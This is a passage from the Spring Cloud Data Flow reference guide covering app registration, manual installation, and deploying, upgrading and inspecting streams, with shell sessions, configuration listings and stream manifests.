\nOnce you mount the host folder, you can register the app starters (from `\/root\/apps`) with the SCDF https:\/\/docs.spring.io\/spring-cloud-dataflow\/docs\/current\/reference\/htmlsingle\/#shell[Shell] or https:\/\/docs.spring.io\/spring-cloud-dataflow\/docs\/current\/reference\/htmlsingle\/#dashboard-apps[Dashboard] by using the `file:\/\/` URI schema.\nThe following example shows how to do so:\n\n====\n[source,bash,subs=attributes]\n----\ndataflow:>app register --type source --name my-app --uri file:\/\/root\/apps\/my-app-1.0.0.RELEASE.jar\n----\n====\n\nNOTE: You also need to use `--metadata-uri` if the metadata jar is available in the `\/root\/apps` folder.\n\nTo access the host's local Maven repository from within the `dataflow-server` container, you should mount the host's local Maven repository (defaults to `~\/.m2` for OSX and Linux and `C:\\Documents and Settings\\{your-username}\\.m2` for Windows) to a `dataflow-server` volume called `\/root\/.m2\/`. For macOS or Linux host machines, this looks like the following:\n\n====\n[source,yaml,subs=attributes]\n----\n dataflow-server:\n .........\n volumes:\n - ~\/.m2:\/root\/.m2\n----\n====\n\nNow you can use the `maven:\/\/` URI schema and Maven coordinates to resolve jars installed in the host's Maven repository, as the following example shows:\n\n====\n[source,bash,subs=attributes]\n----\ndataflow:>app register --type processor --name pose-estimation --uri maven:\/\/org.springframework.cloud.stream.app:pose-estimation-processor-rabbit:2.0.2.BUILD-SNAPSHOT --metadata-uri maven:\/\/org.springframework.cloud.stream.app:pose-estimation-processor-rabbit:jar:metadata:2.0.2.BUILD-SNAPSHOT\n----\n====\n\nThis approach lets you share jars that are built and installed on the host machine (for example, by using `mvn clean install`) directly with the dataflow-server container.\n\nYou can also pre-register the apps directly in `docker-compose.yml`. For every pre-registered app starter, add an additional `wget` statement to the `app-import` block configuration, as the following example shows:\n\n====\n[source,yaml,subs=attributes]\n----\n app-import:\n image: alpine:3.7\n command: >\n \/bin\/sh -c \"\n ....\n wget -qO- 'http:\/\/dataflow-server:9393\/apps\/source\/my-app' --post-data='uri=file:\/root\/apps\/my-app.jar&metadata-uri=file:\/root\/apps\/my-app-metadata.jar';\n echo 'My custom apps imported'\"\n----\n====\n\nSee the https:\/\/docs.spring.io\/spring-cloud-dataflow\/docs\/current\/reference\/htmlsingle\/#resources-registered-applications[SCDF REST API] for further details.\n\n\n\n[[getting-started-local-deploying-spring-cloud-dataflow]]\n=== Getting Started with Manual Installation\n\nIf Docker does not suit your needs, you can manually install the parts you need to run Spring Cloud Data Flow. To do so:\n\n. Download the Spring Cloud Data Flow Server by using the following command:\n+\n====\n[source,bash,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-server\/{project-version}\/spring-cloud-dataflow-server-{project-version}.jar\n----\n====\n\n. 
Download the Spring Cloud Data Flow Shell application by using the following command:\n+\n====\n[source,bash,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-shell\/{project-version}\/spring-cloud-dataflow-shell-{project-version}.jar\n----\n====\n\n. If you need to enable Stream features, download http:\/\/cloud.spring.io\/spring-cloud-skipper\/[Skipper] (because Data Flow delegates to Skipper for those features) by running the following commands:\n+\n====\n[source,bash,options=nowrap,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-server\/{skipper-version}\/spring-cloud-skipper-server-{skipper-version}.jar\n\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-shell\/{skipper-version}\/spring-cloud-skipper-shell-{skipper-version}.jar\n----\n====\n\nIMPORTANT: These instructions require that RabbitMQ be running on the same machine as Skipper and the Spring Cloud Data Flow server and shell.\n\n. Launch Skipper (required unless the Stream features are disabled and Spring Cloud Data Flow runs in Task mode only). To do so, in the directory where you downloaded Skipper, run the server by using `java -jar`, as follows:\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-skipper-server-{skipper-version}.jar\n----\n====\n\n. Launch the Data Flow Server\n+\nIn a different terminal window and in the directory where you downloaded Data Flow, run the server by using `java -jar`, as follows:\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-{project-version}.jar\n----\n====\n+\nIf Skipper and the Data Flow server are not running on the same host, set the `spring.cloud.skipper.client.serverUri` configuration property to the location of Skipper, as shown in the following example:\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-{project-version}.jar --spring.cloud.skipper.client.serverUri=http:\/\/192.51.100.1:7577\/api\n----\n====\n\n. In another terminal window, launch the Data Flow Shell by running the following command:\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n====\n\nIf the Data Flow Server and shell are not running on the same host, point the shell to the Data Flow server URL by using the `dataflow config server` command in the shell's interactive mode, as the following example shows:\n\n====\n[source,bash]\n----\nserver-unknown:>dataflow config server http:\/\/198.51.100.0\nSuccessfully targeted http:\/\/198.51.100.0\ndataflow:>\n----\n====\n\nAlternatively, you can pass in the `--dataflow.uri` command line option. The shell's `--help` command line option shows what is available.\n
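\nFor example, the following sketch starts the shell already targeted at a remote Data Flow server (reusing the example address shown above):\n\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar --dataflow.uri=http:\/\/198.51.100.0\n----\n====\n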
\nIMPORTANT: If you run Spring Cloud Data Flow Server behind a proxy server (such as\nhttps:\/\/github.com\/Netflix\/zuul[Zuul]), you may also need to set the\n`server.use-forward-headers` property to `true`. An example that uses Zuul is available in the\nhttps:\/\/github.com\/spring-cloud\/spring-cloud-dataflow-samples\/tree\/master\/dataflow-zuul[Spring Cloud Data Flow Samples repository]\non GitHub. Additional information is also available in the\nhttps:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#howto-use-tomcat-behind-a-proxy-server[Spring Boot Reference Guide].\n\n[[getting-started-local-deploying-streams-spring-cloud-dataflow]]\n=== Deploying Streams\n\nDeploying streams requires that you first register some stream applications. By default, the application registry is empty.\nAs an example, register two applications, `http` and `log`, that communicate by using RabbitMQ. To do so, run the following commands:\n\n====\n[source,bash]\n----\ndataflow:>app register --name http --type source --uri maven:\/\/org.springframework.cloud.stream.app:http-source-rabbit:1.2.0.RELEASE\nSuccessfully registered application 'source:http'\n\ndataflow:>app register --name log --type sink --uri maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:1.1.0.RELEASE\nSuccessfully registered application 'sink:log'\n----\n====\n\nFor more details, such as how to register applications that are based on Docker containers or use Kafka as the messaging middleware, see the section on how to <<streams.adoc#spring-cloud-dataflow-register-stream-apps, register applications>>.\n\nNOTE: Depending on your environment, you may need to configure the Data Flow Server to point to a custom\nMaven repository location or configure proxy settings. See <<configuration-maven>> for more information.\n\nNow that you have stream applications, you can create a stream. To do so, use the following `stream create` command to create a stream with an `http` source and a `log` sink and deploy it:\n\n====\n[source,bash]\n----\ndataflow:>stream create --name httptest --definition \"http --server.port=9000 | log\" --deploy\n----\n====\n\nNOTE: You need to wait a little while, until the apps are actually deployed successfully, before posting data.\nYou can look in the log file of the Skipper server for the location of the log files for the `http` and `log` applications.\nYou can use the `tail` command on the log file for each application to verify that the application has started.\n\nOnce the stream has started, you can post some data, as shown in the following example:\n\n====\n[source,bash]\n----\ndataflow:>http post --target http:\/\/localhost:9000 --data \"hello world\"\n----\n====\n\nNow you should check to see if `hello world` ended up in the log file for the `log` application.\nThe location of the log file for the `log` application appears in the Data Flow server's log.\n\nNOTE: When deploying locally, each app (and each app instance, in case of `count > 1`) gets a dynamically assigned `server.port`, unless you explicitly assign one with `--server.port=x`.\nIn both cases, this setting is propagated as a configuration property that overrides any lower-level setting that you may have used (for example, in `application.yml` files).\n\nThe following sections show how to update and roll back streams by using the Local Data Flow server and Skipper.\nIf you run the Unix `jps` command, you can see the two Java processes running, as shown in the following listing:\n\n====\n[source,bash]\n----\n$ jps | grep rabbit\n12643 log-sink-rabbit-1.1.0.RELEASE.jar\n12645 http-source-rabbit-1.2.0.RELEASE.jar\n----\n====\n\n[[getting-started-local-spring-cloud-dataflow-streams-upgrading]]\n==== Upgrading\n\nBefore we start upgrading the log-sink version to 1.2.0.RELEASE, we have to register that version in the app registry.\nThe following command does so:\n\n====\n[source,bash]\n----\ndataflow:>app register --name log --type 
sink --uri maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:1.2.0.RELEASE\nSuccessfully registered application 'sink:log'\n----\n====\n\nSince we are using the local server, we need to set the port to a different value (9002) than the currently running log sink's value of 9000 to avoid a conflict.\nWhile we are at it, we update the log level to `ERROR`.\nTo do so, we create a YAML file, named `local-log-update.yml`, with the following contents:\n\n====\n[source,yml]\n----\nversion:\n log: 1.2.0.RELEASE\napp:\n log:\n server.port: 9002\n log.level: ERROR\n----\n====\n\nNow we can update the stream, as follows:\n\n====\n[source,bash]\n----\ndataflow:> stream update --name httptest --propertiesFile \/home\/mpollack\/local-log-update.yml\nUpdate request has been sent for the stream 'httptest'\n----\n====\n\nBy running the Unix `jps` command, you can see the two Java processes running, but now the log application is version 1.2.0.RELEASE, as shown in the following listing:\n\n====\n[source,bash]\n----\n$ jps | grep rabbit\n22034 http-source-rabbit-1.2.0.RELEASE.jar\n22031 log-sink-rabbit-1.2.0.RELEASE.jar\n----\n====\n\nNow you can look in the log file of the Skipper server.\nTo do so, use the following commands (note that the directory names may not exactly match this example, because the numeric prefix changes):\n\n====\n[source,bash]\n----\ncd \/tmp\/spring-cloud-dataflow-5262910238261867964\/httptest-1511749222274\/httptest.log-v2\ntail -f stdout_0.log\n----\n====\n\nYou should see log entries similar to the following:\n\n====\n[source,bash,options=nowrap]\n----\nINFO 12591 --- [ StateUpdate-1] o.s.c.d.spi.local.LocalAppDeployer : Deploying app with deploymentId httptest.log-v2 instance 0.\n Logs will be in \/tmp\/spring-cloud-dataflow-5262910238261867964\/httptest-1511749222274\/httptest.log-v2\nINFO 12591 --- [ StateUpdate-1] o.s.c.s.s.d.strategies.HealthCheckStep : Waiting for apps in release httptest-v2 to be healthy.\nINFO 12591 --- [ StateUpdate-1] o.s.c.s.s.d.s.HandleHealthCheckStep : Release httptest-v2 has been DEPLOYED\nINFO 12591 --- [ StateUpdate-1] o.s.c.s.s.d.s.HandleHealthCheckStep : Apps in release httptest-v2 are healthy.\n----\n====\n\nNow you can post a message to the http source at port `9000`, as follows:\n\n====\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world upgraded\"\n----\n====\n\nThe log message is now at the error level, as shown in the following example:\n\n====\n[source,bash]\n----\nERROR 22311 --- [http.httptest-1] log-sink : hello world upgraded\n----\n====\n\nIf you query the `\/info` endpoint of the application, you can also see that it is at version `1.2.0.RELEASE`, as shown in the following example:\n\n====\n[source,bash]\n----\n$ curl http:\/\/localhost:9002\/info\n{\"app\":{\"description\":\"Spring Cloud Stream Log Sink Rabbit Binder Application\",\"name\":\"log-sink-rabbit\",\"version\":\"1.2.0.RELEASE\"}}\n----\n====\n\n===== Forcing the Upgrade of a Stream\n\nWhen upgrading a stream, you can use the `--force` option to deploy new instances of currently deployed applications even if no application or deployment properties have changed.\nThis behavior is needed when configuration information is obtained by the application itself at startup time -- for example, from Spring Cloud Config Server.\nYou can specify which applications to force upgrade by using the `--app-names` option.\nIf you do not specify any application names, all the applications are force upgraded.\nYou can specify the `--force` and `--app-names` options together with the `--properties` or `--propertiesFile` options.\n
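\nThe following sketch force-upgrades only the `log` application of the `httptest` stream used in this section (depending on your shell version, you may also need to supply `--properties` or `--propertiesFile`, as described above):\n\n====\n[source,bash]\n----\ndataflow:>stream update --name httptest --force --app-names log\n----\n====\n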
\n===== Overriding Properties During Stream Update\n\nThe properties that are passed during stream update are added on top of the existing properties for the same stream.\n\nFor instance, the `ticktock` stream is deployed without any explicit properties, as follows:\n\n====\n[source,bash]\n----\ndataflow:>stream create --name ticktock --definition \"time | log --name=mylogger\"\nCreated new stream 'ticktock'\n\ndataflow:>stream deploy --name ticktock\nDeployment request has been sent for stream 'ticktock'\n----\n====\n\nYou can view the manifest for the `ticktock` stream by using the `stream manifest` command, as the following example shows:\n\n====\n[source,bash]\n----\ndataflow:>stream manifest --name ticktock\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"time\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n----\n====\n\nNext, we update the stream to add a new property, `foo2=bar2`, to the `log` application, as the following example shows:\n\n====\n[source,bash]\n----\ndataflow:>stream update --name ticktock --properties app.log.foo2=bar2\nUpdate request has been sent for the stream 'ticktock'\n\ndataflow:>stream manifest --name ticktock\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"time\"\n\"spec\":\n \"resource\": 
\"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"foo2\": \"bar2\" \/\/ <1>\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.count\": \"1\"\n \"spring.cloud.deployer.group\": \"ticktock\"\n\ndataflow:>stream list\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551Stream Name\u2502 Stream Definition \u2502 Status \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u2551ticktock \u2502time | log --log.name=mylogger --foo2=bar2\u2502The stream has been successfully 
deployed\u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\n----\n\n<1> Property `foo2=bar2` is applied for the `log` application.\n====\n\nNow, when we add another property `foo3=bar3` to the `log` application, this new property is added on top of the existing properties for the stream `ticktock`. The following example shows the command to do so and the result:\n\n====\n[source,bash]\n----\ndataflow:>stream update --name ticktock --properties app.log.foo3=bar3\nUpdate request has been sent for the stream 'ticktock'\n\ndataflow:>stream manifest --name ticktock\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"time\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"foo2\": \"bar2\" <1>\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"foo3\": \"bar3\" <1>\n \"deploymentProperties\":\n \"spring.cloud.deployer.count\": \"1\"\n \"spring.cloud.deployer.group\": \"ticktock\"\n----\n\n<1> The property `foo3=bar3` is added along with the existing `foo2=bar2` for the `log` 
application.\n====\n\nWe can still override the existing properties, as follows:\n\n====\n[source,bash]\n----\ndataflow:>stream update --name ticktock --properties app.log.foo3=bar4\nUpdate request has been sent for the stream 'ticktock'\n\ndataflow:>stream manifest ticktock\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"time\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"foo2\": \"bar2\" <1>\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"foo3\": \"bar4\" <1>\n \"deploymentProperties\":\n \"spring.cloud.deployer.count\": \"1\"\n \"spring.cloud.deployer.group\": \"ticktock\"\n----\n\n<1> The property `foo3` is replaced with the new value` bar4` and the existing property `foo2=bar2` remains.\n====\n\n===== Stream History\n\nYou can view the history of a stream by running the `stream history` command, as shown (with its output), in the following example:\n\n====\n[source,bash]\n----\ndataflow:>stream history --name httptest\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551Version\u2502 Last updated 
\u2502 Status \u2502Package Name\u2502Package Version\u2502 Description \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u25512 \u2502Mon Nov 27 22:41:16 EST 2017\u2502DEPLOYED\u2502httptest \u25021.0.0 \u2502Upgrade complete\u2551\n\u25511 \u2502Mon Nov 27 22:40:41 EST 2017\u2502DELETED \u2502httptest \u25021.0.0 \u2502Delete complete \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n\n===== Stream Manifest\n\nThe manifest is a YAML document that represents the final state of what was deployed to the platform.\nYou can view the manifest for any stream version by using the `stream manifest --name <name-of-stream> --releaseVersion <optional-version>` command.\nIf the `--releaseVersion` is not specified, the manifest for the last version is returned.\nThe following listing shows a typical `stream manifest` command and its output:\n\n====\n[source,bash]\n----\ndataflow:>stream manifest --name httptest\n\n---\n# Source: log.yml\napiVersion: skipper.spring.io\/v1\nkind: SpringCloudDeployerApplication\nmetadata:\n name: log\nspec:\n resource: maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\n version: 1.2.0.RELEASE\n applicationProperties:\n spring.metrics.export.triggers.application.includes: integration**\n spring.cloud.dataflow.stream.app.label: log\n spring.cloud.stream.metrics.key: httptest.log.${spring.cloud.application.guid}\n spring.cloud.stream.bindings.input.group: httptest\n spring.cloud.stream.metrics.properties: spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\n spring.cloud.dataflow.stream.name: httptest\n spring.cloud.dataflow.stream.app.type: sink\n spring.cloud.stream.bindings.input.destination: httptest.http\n deploymentProperties:\n spring.cloud.deployer.indexed: true\n spring.cloud.deployer.group: httptest\n spring.cloud.deployer.count: 1\n\n---\n# Source: http.yml\napiVersion: skipper.spring.io\/v1\nkind: SpringCloudDeployerApplication\nmetadata:\n name: http\nspec:\n resource: maven:\/\/org.springframework.cloud.stream.app:http-source-rabbit\n version: 1.2.0.RELEASE\n applicationProperties:\n spring.metrics.export.triggers.application.includes: integration**\n spring.cloud.dataflow.stream.app.label: http\n spring.cloud.stream.metrics.key: httptest.http.${spring.cloud.application.guid}\n 